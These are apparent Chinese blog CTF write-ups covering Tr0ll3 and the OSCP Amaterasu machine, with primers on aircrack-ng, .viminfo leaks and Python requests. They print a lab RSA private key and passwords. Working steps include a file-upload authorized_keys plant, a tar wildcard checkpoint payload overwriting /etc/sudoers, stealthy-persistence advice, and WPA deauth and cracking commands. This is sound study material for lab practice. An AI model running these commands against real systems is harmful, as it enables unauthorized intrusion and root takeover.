32# Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
33##
34
35# Default server configuration
36#
37server {
38 listen 8080 default_server;
39 listen [::]:8080 default_server;
40 if ($http_user_agent !~ "Lynx*"){
41 return 403;
42}
43 # SSL configuration
44 #
45 # listen 443 ssl default_server;
46 # listen [::]:443 ssl default_server;
47 #
48 # Note: You should disable gzip for SSL traffic.
49 # See: https://bugs.debian.org/773332
50 #
51 # Read up on ssl_ciphers to ensure a secure configuration.
52 # See: https://bugs.debian.org/765782
53 #
54 # Self signed certs generated by the ssl-cert package
55 # Don't use them in a production server!
56 #
57 # include snippets/snakeoil.conf;
58
59 root /var/nginx/www;
60
61 # Add index.php to the list if you are using PHP
62 index index.html index.htm index.nginx-debian.html;
63
64 server_name _;
65
66 location / {
67 # First attempt to serve request as file, then
68 # as directory, then fall back to displaying a 404.
69 try_files $uri $uri/ =404;
70 }

Kali再次扫描确认8080端口确实打开了。

带Agent参数访问得到一个新的用户名和密码genphlux:HF9nd0cR!。

1curl -A "Lynx" http://172.168.169.142:8080

SSH密钥获取

登录genphlux用户发现可以开启apache服务，但是开了好像也访问不了。

回到原来的位置sudo -l一下

 1wytshadow@Tr0ll3:/tmp$ su genphlux
 2Password:
 3genphlux@Tr0ll3:/tmp$ id
 4uid=1004(genphlux) gid=1004(genphlux) groups=1004(genphlux)
 5genphlux@Tr0ll3:/tmp$ sudo -l
 6[sudo] password for genphlux:
 7Matching Defaults entries for genphlux on Tr0ll3:
 8 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 9
10User genphlux may run the following commands on Tr0ll3:
11 (root) /usr/sbin/service apache2 start
12genphlux@Tr0ll3:/tmp$sudo /usr/sbin/service apache2 start

在用户目录下发现存在maleus用户的密钥。将密钥文字复制到Kali上即可用密钥登录新用户。

 1genphlux@Tr0ll3:~$ ll
 2total 44
 3drwx------ 4 genphlux genphlux 4096 Aug 2 2019 ./
 4drwxr-xr-x 10 root root 4096 Jun 19 2015 ../
 5-rw-r--r-- 1 genphlux genphlux 220 Jun 17 2015 .bash_logout
 6-rw-r--r-- 1 genphlux genphlux 3637 Jun 17 2015 .bashrc
 7drwx------ 2 genphlux genphlux 4096 Jun 17 2015 .cache/
 8drwx------ 3 genphlux genphlux 4096 Aug 1 2019 .gnupg/
 9-rw-rw-r-- 1 genphlux genphlux 1675 Jun 18 2015 maleus
10-rw-r--r-- 1 genphlux genphlux 675 Jun 17 2015 .profile
11-rw------- 1 genphlux genphlux 5649 Jun 17 2015 .viminfo
12-rw-rw-r-- 1 genphlux genphlux 931 Aug 2 2019 xlogin
13genphlux@Tr0ll3:~$ cat maleus
14-----BEGIN RSA PRIVATE KEY-----
15MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
16DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
17yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
18u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
19gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
20eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
21pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
22Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
23SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
24eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
25PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
26kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
27jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
287BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
29KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
301cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
31ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
32N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
33syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
342H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
35EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
365XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
37xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
38Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
39wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
40-----END RSA PRIVATE KEY-----
41# 上面密钥复制到Kali中
42┌──(kali㉿kali)-[~/Desktop/Tr0ll3]
43└─$ ssh maleus@172.168.169.142 -i maleus

VIM信息发现

有个可执行文件，查看发现密码，但是执行这个文件，sudo输入这个密码都提示不对。发现用户文件夹下还有一个viminfo文件。发现密码 B^slc8I$就是maleus用户的密码。

sudo -l发现当前用户可以以root身份执行刚刚那个脚本，而且脚本也是对当前用户有写权限，所以把脚本写到这个文件里执行即可获得权限。

C脚本提权

1int main()
2{
3 system("/bin/bash");
4}

因为dont_even_bother是个编译后的脚本，而从最开始的信息收集中发现，gcc命令是可以执行的，所以写一个最简单的C脚本即可提权。

1gcc test.c -o dont_even_bother
2sudo ./dont_even_bother

Pr00fThatTh3L33tHax0rG0tTheFl@g!!

其他信息

在www文件夹下发现用户名和密码 fido:x4tPl!，但是su切换不过去，或许有别的方法可以进，下次试试。

Apache服务80端口开了，但是不知道如何访问，无论是Kali还是靶机内部的root用户访问都提示403

补充知识点

Aircrack-ng：无线网络安全审计终极工具

Aircrack-ng 是一款开源的 WiFi 网络安全工具套件，主要用于：

📶 无线网络渗透测试
🔓 WEP/WPA/WPA2-PSK 密钥破解
🔍 无线网络流量分析
📡 无线接入点审计

核心功能组件

工具	功能描述	典型用途
airmon-ng	启用无线网卡监控模式	准备网卡进行抓包
airodump-ng	捕获并分析 WiFi 流量（握手包、信标帧等）	扫描网络并保存抓包文件
aireplay-ng	生成自定义无线流量（欺骗、重放攻击）	强制设备重连获取WPA握手包
aircrack-ng	使用字典攻击/暴力破解破解 WEP/WPA/WPA2 密钥	实际密码破解
airdecap-ng	用破解的密钥解密捕获的流量	分析网络中的明文通信

主要应用场景

1. WEP加密破解

1# 捕获足够IVs数据包后直接破解
2aircrack-ng -b 00:11:22:33:44:55 capture.cap

2. WPA/WPA2握手包捕获与破解

1# 捕获握手包
2airodump-ng -c 6 --bssid AP_MAC -w capture wlan0mon
3
4# 使用字典破解
5aircrack-ng -w password.lst -b AP_MAC capture.cap

3. 创建虚拟接入点

1# 模拟合法AP进行中间人攻击
2airbase-ng -e "Free_WiFi" -c 6 wlan0mon

4. 无线网络诊断

1# 检测隐藏SSID网络
2airodump-ng wlan0mon --hidden

经典破解流程（WPA/WPA2）

启用监控模式：airmon-ng start wlan0
扫描网络：airodump-ng wlan0mon

捕获握手包：

1airodump-ng -c [频道] --bssid [AP_MAC] -w capture wlan0mon

强制握手（可选）：

1aireplay-ng -0 4 -a [AP_MAC] -c [客户端MAC] wlan0mon

破解密码：

1aircrack-ng -w rockyou.txt capture-01.cap

重要技术参数

参数	作用示例	破解成功率因素
字典质量	`-w rockyou.txt`	70%+ 常见密码可在前100万条命中
GPU加速	`--gpu-temp-disable`	NVIDIA/AMD显卡可提速100倍
规则攻击	`-r rules.txt`	通过变形规则扩展字典
会话恢复	`-l session.txt`	中断后可恢复破解进度
多文件处理	`files/*.cap`	可批量处理多个抓包文件

替代工具推荐

Hashcat：支持GPU加速的密码破解（兼容aircrack捕获文件）
Wifite：自动化无线审计工具（基于aircrack-ng）
Fern Wifi Cracker：图形化无线审计工具
Kismet：无线网络探测与IDS系统

`.viminfo` 文件详解

.viminfo 是 Vim 文本编辑器自动生成的用户状态记录文件，通常位于用户主目录（~/.viminfo）。它在 Vim 启动时读取，关闭时更新，用于保存用户编辑会话之间的状态信息。

主要作用

功能	具体说明
命令历史	保存 `:` 命令行模式输入的所有命令
搜索历史	记录 `/` 和 `?` 搜索模式的所有关键字
跳转位置	保存用户在各文件中的光标位置 (`'` 和 ``` 标记)
寄存器内容	存储复制/删除操作的临时数据 (包括未命名寄存器 `"`)
缓冲区列表	记录最近编辑过的文件路径
输入行历史	保存命令行模式下输入的长命令片段

敏感信息泄露风险

该文件可能暴露以下敏感信息：

1. 文件路径与内容

# 示例 .viminfo 片段
|4,1,48,2,1,0,1646305385,"~/Documents/secret_passwords.txt"
|4,0,34,1,0,0,1646305427,":w !sudo tee %" # 暴露sudo操作

泄露路径：个人文档、机密项目、密码文件的完整路径
命令风险：sudo操作、文件解密/加密命令

2. 凭证与密钥片段

|4,7,1,0,1,0,1646305302,"/API_KEY=\"sk_live_"
|4,3,1,0,1,0,1646305351,"/password = \"Admin@2023"

API密钥、密码等敏感文本碎片
数据库连接字符串、SSH私钥片段

3. 操作系统敏感数据

|4,0,32,1,0,0,1646305487,":!cat /etc/passwd" # 系统文件操作
|4,1,41,2,1,0,1646305521,"~/.ssh/id_rsa" # 密钥文件路径

系统命令操作记录 (! 开头的命令)
SSH密钥、配置文件路径

4. 隐私行为痕迹

|4,4,1,0,1,0,1646305555,"/salary.xlsx" # 财务文件
|4,1,38,2,1,0,1646305589,":e ~/medical_records.txt" # 医疗记录

隐私文档访问痕迹
敏感搜索历史（如个人信息、证件号等）

安全防护措施

1. 禁用 .viminfo（推荐）

在 ~/.vimrc 中添加：

set viminfo=
set viminfo+=n$HOME/.vim/viminfo " 自定义加密路径

2. 按需排除敏感信息

1" 不保存寄存器内容
2set viminfo='0
3
4" 禁用搜索/命令历史
5set viminfo=/0,:0
6
7" 跳过特定寄存器 (e.g. 复制寄存器"0)
8set viminfo-=r0

3. 文件权限加固

1chmod 600 ~/.viminfo # 仅用户可读写
2sudo chattr +i ~/.viminfo # 禁止修改 (Immutable flag)

4. 自动清理脚本

创建定期清理任务 (cron):

1# 每日清空 .viminfo
20 3 * * * echo "" > ~/.viminfo

5. 替代安全工具

工具	安全特性
Neovim	支持 `shada` 加密 (`:h 'shada'`)
Vim.gui	可完全禁用历史 (`:set viminfo=NONE`)
Emacs	历史文件独立加密 (`~/.emacs.desktop.lock`)

取证分析示例

攻击者获取 .viminfo 后可能提取信息：

grep -E '"(/|!|:)' ~/.viminfo # 提取命令和搜索
grep '"[a-zA-Z0-9_]{20,}' ~/.viminfo # 查找长字符串 (可能密钥)

📌 关键建议：在共享系统或处理敏感数据时，始终在 vimrc 中配置 set viminfo= ，或使用 vim -i NONE 临时禁用该功能。

用Python模仿curl的方法

这个靶机中存在无法使用curl的情况，可以使用python来模仿curl的功能。在 Python 3 的交互式环境（如 python shell 或 ipython）中模拟 curl 的功能，可以使用 requests 或 urllib 库。以下是完整指南：

🐍 使用 `requests` 库

 1# 安装 requests（如果未安装）
 2>>> import sys, subprocess
 3>>> if 'requests' not in sys.modules:
 4... subprocess.check_call([sys.executable, "-m", "pip", "install", "requests"])
 5... import requests
 6... else:
 7... import requests
 8
 9# 1. 发起 GET 请求（类似 curl http://example.com）
10>>> response = requests.get('https://httpbin.org/get')
11>>> response.status_code
12200
13>>> response.text # 获取响应内容
14
15# 2. 发起 POST 请求（类似 curl -X POST -d "key=value"）
16>>> payload = {'username': 'admin', 'password': 'secret'}
17>>> response = requests.post('https://httpbin.org/post', data=payload)
18>>> response.json() # 解析 JSON 响应
19
20# 3. 自定义 Headers（类似 curl -H "Content-Type: application/json"）
21>>> headers = {'User-Agent': 'PyCurl/1.0', 'X-Custom': 'value'}
22>>> response = requests.get('https://httpbin.org/headers', headers=headers)
23
24# 4. 处理 Cookies（类似 curl --cookie "name=value"）
25>>> response = requests.get('https://httpbin.org/cookies', cookies={'session': 'abc123'})
26
27# 5. 文件上传（类似 curl -F "file=@test.txt"）
28>>> files = {'file': ('filename.txt', open('test.txt', 'rb'))}
29>>> response = requests.post('https://httpbin.org/post', files=files)
30
31# 6. 处理重定向（默认自动重定向，禁用类似 curl -L）
32>>> response = requests.get('https://httpbin.org/redirect/1', allow_redirects=False)
33
34# 7. 超时设置（类似 curl --max-time 5）
35>>> try:
36... response = requests.get('https://httpbin.org/delay/10', timeout=3)
37... except requests.exceptions.Timeout:
38... print("Request timed out!")

📊 功能对照表

curl 命令示例	Python requests 等效代码
`curl http://example.com`	`requests.get('http://example.com')`
`curl -X POST -d "key=value"`	`requests.post(url, data={'key':'value'})`
`curl -H "Authorization: Bearer token"`	`requests.get(url, headers={'Authorization':'Bearer token'})`
`curl --cookie "session=abc"`	`requests.get(url, cookies={'session':'abc'})`
`curl -L --location-trusted`	`requests.get(url, allow_redirects=True)`
`curl --data-binary @file.txt`	`requests.post(url, data=open('file.txt','rb'))`
`curl -u user:pass`	`requests.get(url, auth=('user','pass'))`

🌐 使用标准库 `urllib`（无需安装）

 1>>> from urllib import request, parse
 2
 3# GET 请求
 4>>> with request.urlopen('https://httpbin.org/get') as res:
 5... print(res.read().decode('utf-8'))
 6
 7# POST 请求
 8>>> data = parse.urlencode({'key': 'value'}).encode()
 9>>> req = request.Request('https://httpbin.org/post', data=data)
10>>> with request.urlopen(req) as res:
11... print(res.read().decode('utf-8'))
12
13# 添加 Headers
14>>> req = request.Request('https://httpbin.org/headers')
15>>> req.add_header('User-Agent', 'Python-URLLib/3.0')
16>>> request.urlopen(req)

⚙️ 高级技巧

1. 保持会话状态（模拟多个连续请求）

1>>> session = requests.Session()
2>>> session.get('https://httpbin.org/cookies/set/session/abc123') # 设置 cookie
3>>> response = session.get('https://httpbin.org/cookies') # 携带 cookie

2. 处理 SSL/TLS 证书验证

1# 忽略证书错误（类似 curl -k）
2>>> requests.get('https://expired.badssl.com', verify=False)
3
4# 使用自定义 CA 证书
5>>> requests.get('https://internal.site', verify='/path/to/ca.pem')

3. 调试请求详情（类似 curl -v）

1>>> import logging
2>>> logging.basicConfig(level=logging.DEBUG) # 启用调试输出
3>>> requests.get('https://httpbin.org/get')

4. 进度条显示（大文件下载）

1>>> from tqdm import tqdm
2>>> url = "https://example.com/bigfile.zip"
3>>> response = requests.get(url, stream=True)
4>>> with open("bigfile.zip", "wb") as f, tqdm(total=int(response.headers.get('content-length',0)), unit='B') as pbar:
5... for chunk in response.iter_content(chunk_size=1024):
6... f.write(chunk)
7... pbar.update(len(chunk))

💡 在 IPython 中的交互技巧

在 IPython 环境中 (pip install ipython)，可以使用 ! 直接运行系统命令：

1!curl https://httpbin.org/get

或者捕获输出：

1curl_output = !curl -s https://httpbin.org/get
2print(curl_output)

对于 Python 函数，使用 %time 计时：

1%time requests.get('https://google.com')

注意事项

在生产环境中避免 verify=False，会降低安全性
处理大文件下载时使用 stream=True 避免内存耗尽
对于复杂站点（JS渲染），考虑使用 selenium 替代
HTTP/2 支持需安装 httpx 库（pip install httpx）

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场-Amaterasu WP

Thu, 17 Jul 2025 17:23:45 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官方网页打开靶机，此靶机目前暂未在https://www.vulnhub.com/ 有镜像文件，后续若官方给出，会在评论补充。连上VPN后测速自动设置MTU【踩坑总结】丝滑连接OffSec官方VPN的方法。

信息收集

1# 靶机地址
2192.168.222.249
3# Kali攻击机地址
4192.168.45.156
5# 题目提示的用户凭证
6alfredo
7DriveMailLens774

扫描端口

1ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.222.249 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.222.249
4sudo nmap --script=vuln -p$ports -Pn 192.168.222.249

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop/Amaterasu]
 2└─$ echo $ports
 321,22,111,139,443,445,2049,10000,25022,33414,40080
 4
 5┌──(kali㉿kali)-[~/Desktop/Amaterasu]
 6└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.222.249
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 22:16 EDT
 8Nmap scan report for bogon (192.168.222.249)
 9Host is up (0.21s latency).
10
11PORT STATE SERVICE
1221/tcp open ftp
1322/tcp closed ssh
14111/tcp closed rpcbind
15139/tcp closed netbios-ssn
16443/tcp closed https
17445/tcp closed microsoft-ds
182049/tcp closed nfs
1910000/tcp closed snet-sensor-mgmt
2025022/tcp open unknown
2133414/tcp open unknown
2240080/tcp open unknown
23
24Nmap done: 1 IP address (1 host up) scanned in 32.13 seconds
25
26┌──(kali㉿kali)-[~/Desktop/Amaterasu]
27└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.222.249
28Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 22:13 EDT
29Nmap scan report for bogon (192.168.222.249)
30Host is up (0.11s latency).
31
32PORT STATE SERVICE VERSION
3321/tcp open ftp vsftpd 3.0.3
34| ftp-syst: 
35| STAT: 
36| FTP server status:
37| Connected to 192.168.45.156
38| Logged in as ftp
39| TYPE: ASCII
40| No session bandwidth limit
41| Session timeout in seconds is 300
42| Control connection is plain text
43| Data connections will be plain text
44| At session startup, client count was 3
45| vsFTPd 3.0.3 - secure, fast, stable
46|_End of status
47| ftp-anon: Anonymous FTP login allowed (FTP code 230)
48|_Can't get directory listing: TIMEOUT
4922/tcp closed ssh
50111/tcp closed rpcbind
51139/tcp closed netbios-ssn
52443/tcp closed https
53445/tcp closed microsoft-ds
542049/tcp closed nfs
5510000/tcp closed snet-sensor-mgmt
5625022/tcp open ssh OpenSSH 8.6 (protocol 2.0)
57| ssh-hostkey: 
58| 256 68:c6:05:e8:dc:f2:9a:2a:78:9b:ee:a1:ae:f6:38:1a (ECDSA)
59|_ 256 e9:89:cc:c2:17:14:f3:bc:62:21:06:4a:5e:71:80:ce (ED25519)
6033414/tcp open http Werkzeug httpd 2.2.3 (Python 3.9.13)
61|_http-server-header: Werkzeug/2.2.3 Python/3.9.13
62|_http-title: 404 Not Found
6340080/tcp open http Apache httpd 2.4.53 ((Fedora))
64| http-methods: 
65|_ Potentially risky methods: TRACE
66|_http-title: My test page
67|_http-server-header: Apache/2.4.53 (Fedora)
68Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (98%), Linux 4.15 - 5.19 (94%), Linux 2.6.32 - 3.13 (93%), Linux 5.0 (92%), OpenWrt 22.03 (Linux 5.10) (92%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (90%), Linux 4.15 (90%), Linux 2.6.32 - 3.10 (90%)
69No exact OS matches for host (test conditions non-ideal).
70Service Info: OS: Unix
71
72OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
73Nmap done: 1 IP address (1 host up) scanned in 52.68 seconds

FTP登录

Nmap扫描结果提示是可以弱密码登录FTP的，但是登录上去之后操作受限。

 1| FTP - system: 
 2| STAT: 
 3| FTP服务器状态：
 4|连接192.168.45.156 
 5|以FTP方式登录
 6| TYPE: ASCII 
 7|无会话带宽限制
 8|会话超时时间为300秒
 9|控制连接为明文
10|数据连接为明文
11|会话启动时客户端数为3 
12| vsFTPd 3.0.3安全、快速、稳定
13|_状态结束
14| FTP - Anonymous：允许匿名FTP登录（FTP代码230）
15|_无法获取目录列表：TIMEOUT

也不能用题目给的提示信息登录。

网页信息

33414端口无法直接访问，40080端口可以打开。

没有有效信息，但是再次查看的Nmap的扫描结果，确定33414 端口是打开的，那么说明网页文件可能不是index.html的形式打开就能看，要扫描一下找找隐藏文件。

扫描目录

中间VPN波动短了一次，重启后靶机地址变为192.168.203.249，攻击机地址变为192.168.45.228

1dirsearch -u http://192.168.203.249:33414 -x 302,403
2# 或
3gobuster dir -u http://192.168.203.249:33414/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -t 25 -o scan_report.txt -k --random-agent

1"Python File Server REST API v2.5"
2"Author: Alfredo Moroder"
3"GET /help = List of the commands"
4
5"GET /info : General Info"
6"GET /help : This listing"
7"GET /file-list?dir=/tmp : List of the files"
8"POST /file-upload : Upload files"

/file-list?dir=/tmp 这个能目录遍历，能确定第一个flag文件的位置，但是不能看root下面的文件夹。

40080端口火狐页面的网站地址。

FTP的配置文件？

但是只有目录遍历是不够的，如果想要查看文件就无法直接读取。所以，下一步还是要建立一个稳定的Shell。

建立稳定Shell

文件上传

从help 页面看到提示/file-upload似乎可以上传文件，但是输入网页是无法访问的，四喜观察发现了，限定请求方式是只能POST，没有GET。

在终端使用curl来请求这个POST。

1curl -X POST http://192.168.203.249:33414/file-upload

提示没有要上传的文件，说明是要带上文件参数运行的。

1curl http://192.168.203.249:33414/file-upload -X POST -F "file=@本地文件路径"

提示需要文件名。

1echo a > a.txt # 随便写点
2curl http://192.168.203.249:33414/file-upload -X POST -F "file=@a.txt" -F "filename=aaa"

成功了，尝试别的文件行不行。发现只允许txt, pdf, png, jpg, jpeg, gif这几种格式。

如果这个靶机用的php搭建的，那么我们现在可以上传图片马，改名成a.pnp，然后在蚁剑中连接即可，或者直接上传一个php反弹的脚本。但是由于网页并没有使用PHP，所以这个方法行不通。尝试把文件传到别处，发现在/home/alfredo文件夹下上传成功。

虽然说传不了图片马，但是/home/alfredo可以读写的话，就可以传一个ssh密钥上去用于免密登录SSH。

生成密钥上传

生成密钥对
```
1ssh-keygen
```
- 作用：生成公钥/私钥对（RSA 算法）
- 生成文件：
  - id_rsa：私钥（客户端本地保存，绝不可泄露）
  - id_rsa.pub：公钥（上传到服务器）
设置私钥权限
```
1chmod 600 id_rsa
```
- 作用：设置私钥文件仅当前用户可读写
- 原因：SSH 拒绝使用权限过大的私钥文件（>600）
创建授权文件
```
1cp id_rsa.pub authorized_keys
```
- 作用：将公钥转为 SSH 认证格式
- 说明：authorized_keys文件存储所有被允许的公钥
备份授权文件
```
1cp authorized_keys authorized_keys.txt
```
- 作用：创建公钥列表备份（可选步骤）

上传密钥

1curl -i -L -X POST -H "Content-Type: multipart/form-data" -F "file=@/home/kali/Desktop/authorized_keys.txt" -F "filename=/home/alfredo/.ssh/authorized_keys" http://192.168.203.249:33414/file-upload
2
3curl http://192.168.203.249:33414/file-upload -X POST -F "file=@authorized_keys.txt" -F "filename=/home/alfredo/.ssh/authorized_keys"

将密钥传到服务器后就可以用密钥登录了。

使用密钥登录
```
1ssh alfredo@192.168.203.249 -i id_rsa -p 25022
```
- -i id_rsa：指定私钥文件路径
- -p 25022：指定非标准 SSH 端口

发现第一个Flag。

提权root

进入终端后发现不能sudo -l，这里其实题目给了提示，Alfredo的密码是DriveMailLens774。但是这样就没意思了。还是尽量自己找其他能进root的方式。

上传小豌豆

老样子还是掏出小豌豆一顿梭哈。

1wget https://ghfast.top/https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/linpeas.sh

这里提示靶机的网络环境似乎是找不到github，问题不大，可以在本机下载后再用scp上传即可，或者在本机开启短暂的http网页，靶机请求下载即可。

使用开启网页下载的方式无法下载，换tmp目录也是下载很慢。

问题不大，还有Plan B，用SCP方式上传。

1scp -i id_rsa -P 25022 linpeas.sh alfredo@192.168.203.249:/home/alfredo

内网信息收集

扫描发现日志文件中存在一个用root身份执行的备份脚本。

1*/1 * * * * root /usr/local/bin/backup-flask.sh

pkexec 提权尝试

又可以用这个命令一键提权，但是提权失败了，因为 alfredo账户没有sudu权限，可执行命令里面页没有pkexec。

可以执行的命令。

发现alfredo账户原本的密钥，这里可以复制下来，然后悄咪咪删除我们传上去的临时密钥，以后用本尊密钥登录，神不知鬼不觉的。

1# 从服务器下载文件
2scp -i id_rsa -P 25022 alfredo@192.168.203.249:[远程文件] [本地路径]

后面没有发现有用的信息了，所以还是回到之前发现定时任务中。看一下这个命令的权限，我们能不能直接修改，看看他写了什么。

1ls /usr/local/bin/backup-flask.sh -al
2cat /usr/local/bin/backup-flask.sh

可以发现，对backup-flask.sh文件，无法直接修改内容，因为alfredo账户对这个文件只有读和执行权限。而backup-flask.sh脚本完成了三件事：

修改环境变量：

export PATH="/home/alfredo/restapi:$PATH"

把 /home/alfredo/restapi目录添加到系统命令搜索路径的最前面，后续执行命令时，系统会优先在这个目录中查找可执行文件
切换工作目录：

cd /home/alfredo/restapi

进入 restapi 应用程序所在的目录
打包文件：

tar czf /tmp/flask.tar.gz *

将当前目录所有文件（*）压缩成 gzip 格式的 tar 包 flask.tar.gz存档，保存在 /tmp目录下，c表示创建新压缩包，z表示使用 gzip 压缩，f指定输出文件名。

能利用的命令只有tar命令，另外两个命令在https://gtfobins.github.io/#搜不到相应的提权用法。

https://gtfobins.github.io/gtfobins/tar/，提权的具体原理见文末Tar提权详解

Tar提权

 1cd /home/alfredo/restapi
 2cat > payload.sh
 3
 4echo 'alfredo ALL=(root) NOPASSWD: ALL' > /etc/sudoers
 5# 上面是开放所有权限，动作大，实际渗透中容易被发现
 6# 下面这个命令是只开放pkexec的无密码sudo执行权限，一般管理员不仔细查的话是发现不了的
 7echo 'alfredo ALL=(root) NOPASSWD: /usr/bin/pkexec' > /etc/sudoers
 8# 输入完按 Ctrl D结束即可保存
 9
10chmod +x payload.sh
11echo "" > '--checkpoint=1' 
12echo "" > '--checkpoint-action=exec=sh payload.sh'
13
14# 等待打包命令执行
15# 用之前执行失败的提权方式再次提权
16sudo pkexec /bin/sh # bash也行
17sudo pkexec /bin/bash
18# 如果开放的是全权限，直接进入即可。
19sudo -l 
20sudo /bin/bash

知识点整理

🔑 SSH 密钥认证全流程（重要文件位置）：

文件	位置	角色	权限要求
私钥 `id_rsa`	客户端（您的电脑）	认证身份	`chmod 600` （仅用户读写）
公钥 `id_rsa.pub`	服务端 `~/.ssh/authorized_keys`	授权认证	自动处理
授权文件 `authorized_keys`	服务端 `~/.ssh/`目录	公钥白名单	`chmod 600`

⚠️ 安全注意事项：

私钥保护
- 私钥相当于密码，需妥善保管
- 禁用私钥：服务器上删除 authorized_keys中对应公钥

服务器文件权限

1chmod 700 ~/.ssh # 目录权限
2chmod 600 ~/.ssh/authorized_keys # 授权文件权限

增强安全性

1ssh-keygen -o -a 100 -t ed25519 # 使用更安全的ED25519算法

💡 密钥认证比密码更安全的原因：抗暴力破解、支持双因素认证（私钥+密码）、可撤销性强。

Tar提权详解

1tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

这个命令利用了 tar命令的检查点功能来执行任意命令，最终会启动一个交互式的 shell（/bin/sh）。下面是详细解释：

命令分解：

1tar -cf /dev/null /dev/null # 基础归档操作
2--checkpoint=1 # 设置检查点间隔
3--checkpoint-action=exec=/bin/sh # 在每个检查点执行指定命令

逐步解释：

归档操作：
```
1tar -cf /dev/null /dev/null
```
- -c：创建新归档
- -f /dev/null：指定归档文件为系统空设备（写入的内容会被丢弃）
- /dev/null：被归档的文件（同样是空设备）
- 效果：实际上不产生任何文件，只是一个空操作
检查点设置：
```
1--checkpoint=1
```
- 每处理 1 个文件 就触发一次检查点（默认是每 10 个记录触发）
检查点动作：
```
1--checkpoint-action=exec=/bin/sh
```
- 在每次检查点触发时执行 /bin/sh
- 效果：当 tar处理第一个（也是唯一一个）文件（/dev/null）时立即启动一个 shell，这个Shell用哪个角色执行就是那个角色的权限。

⚠️ 安全风险：

这是著名的 tar 提权技术，常用于：

绕过受限环境获取完整 shell
当用户有权限执行 tar 时进行权限提升
反弹 shell 的技术变种

实际效果：

该命令会立即启动一个 交互式 shell（/bin/sh）
因为归档目标是 /dev/null，所以不生成任何实际文件
完整命令会在当前用户上下文执行 /bin/sh

典型攻击场景：

SUID 提权：

1find / -perm -u=s -type f 2>/dev/null | grep tar
2# 如果返回 /bin/tar，则运行：
3/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

sudo 权限提升：

1sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

容器逃逸：

在 Docker 容器内运行可直接获得宿主机 shell（若容器以特权模式运行）

Tar提权命令配合*通配符的用法

